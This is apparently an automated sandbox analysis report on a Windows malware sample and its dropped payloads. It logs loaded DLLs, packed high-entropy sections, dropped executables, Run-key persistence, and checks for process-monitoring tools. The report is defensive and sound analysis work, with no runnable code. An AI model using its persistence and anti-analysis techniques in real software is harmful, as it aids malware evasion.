Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winmm.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wininet.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: wldp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: profapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000350002\6a8d4317d4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: h3yRbjNWk1.exe Static file information: File size 1866752 > 1048576
Source: h3yRbjNWk1.exe Static PE information: Raw size of mjkoefrk is bigger than: 0x100000 < 0x196000
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 4af6eb3e1f.exe, 0000000C.00000003.2595479701.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, 4af6eb3e1f.exe, 0000000C.00000002.2730540172.0000000000312000.00000040.00000001.01000000.0000000B.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Unpacked PE file: 0.2.h3yRbjNWk1.exe.7c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.a50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mjkoefrk:EW;ikspwnpi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Unpacked PE file: 7.2.ea2c7beae0.exe.b30000.0.unpack :EW;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 8.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Unpacked PE file: 12.2.4af6eb3e1f.exe.310000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vnhbgiry:EW;hdcovdvs:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 14.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Unpacked PE file: 16.2.ea2c7beae0.exe.b30000.0.unpack :EW;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;lfmcaccf:EW;srlszley:EW;.taggant:EW;
Source: C:\Users\user\1000350002\6a8d4317d4.exe Unpacked PE file: 17.2.6a8d4317d4.exe.d20000.0.unpack :EW;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;nsvghvat:EW;rciruuiw:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 6a8d4317d4.exe.6.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: random[1].exe.6.dr Static PE information: real checksum: 0x2dc1a9 should be: 0x2db2ec
Source: num.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: h3yRbjNWk1.exe Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: random[1].exe1.6.dr Static PE information: real checksum: 0x1b2d2b should be: 0x1ab3a2
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: skotes.exe.0.dr Static PE information: real checksum: 0x1ce593 should be: 0x1d487a
Source: ea2c7beae0.exe.6.dr Static PE information: real checksum: 0x2dc1a9 should be: 0x2db2ec
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1d976d should be: 0x1d4104
Source: num[1].exe.6.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 4af6eb3e1f.exe.6.dr Static PE information: real checksum: 0x1b2d2b should be: 0x1ab3a2
PE file contains sections with non-standard names
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: .idata
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: mjkoefrk
Source: h3yRbjNWk1.exe Static PE information: section name: ikspwnpi
Source: h3yRbjNWk1.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: mjkoefrk
Source: skotes.exe.0.dr Static PE information: section name: ikspwnpi
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name: lfmcaccf
Source: random[1].exe.6.dr Static PE information: section name: srlszley
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: ea2c7beae0.exe.6.dr Static PE information: section name:
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .rsrc
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .idata
Source: ea2c7beae0.exe.6.dr Static PE information: section name: lfmcaccf
Source: ea2c7beae0.exe.6.dr Static PE information: section name: srlszley
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: nsvghvat
Source: random[1].exe0.6.dr Static PE information: section name: rciruuiw
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .rsrc
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .idata
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: nsvghvat
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: rciruuiw
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: vnhbgiry
Source: random[1].exe1.6.dr Static PE information: section name: hdcovdvs
Source: random[1].exe1.6.dr Static PE information: section name: .taggant
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .idata
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: vnhbgiry
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: hdcovdvs
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .taggant
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .rsrc
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .idata
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: nsvghvat
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: rciruuiw
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .taggant
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .idata
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: mjkoefrk
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: ikspwnpi
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6D91C push ecx; ret 6_2_00A6D92F
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A56A78 push 000000A5h; iretd 11_3_00A56A82
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49348 push ebp; ret 11_3_00A49349
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A4E521 push eax; retf 11_3_00A4E53D
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 11_3_00A49500 pushfd ; ret 11_3_00A49501
Source: h3yRbjNWk1.exe Static PE information: section name: entropy: 7.978806357998039
Source: h3yRbjNWk1.exe Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.978806357998039
Source: skotes.exe.0.dr Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.972434411391327
Source: ea2c7beae0.exe.6.dr Static PE information: section name: entropy: 7.972434411391327
Source: random[1].exe0.6.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: random[1].exe1.6.dr Static PE information: section name: entropy: 7.8017228103971235
Source: random[1].exe1.6.dr Static PE information: section name: vnhbgiry entropy: 7.952943091917195
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: entropy: 7.8017228103971235
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: vnhbgiry entropy: 7.952943091917195
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: nsvghvat entropy: 7.953578874486692
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: entropy: 7.978806357998039
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: mjkoefrk entropy: 7.953119223352716
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000350002\6a8d4317d4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe Jump to dropped file
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6a8d4317d4.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ea2c7beae0.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000350002\6a8d4317d4.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Window searched: window name: FilemonClass Jump to behavior
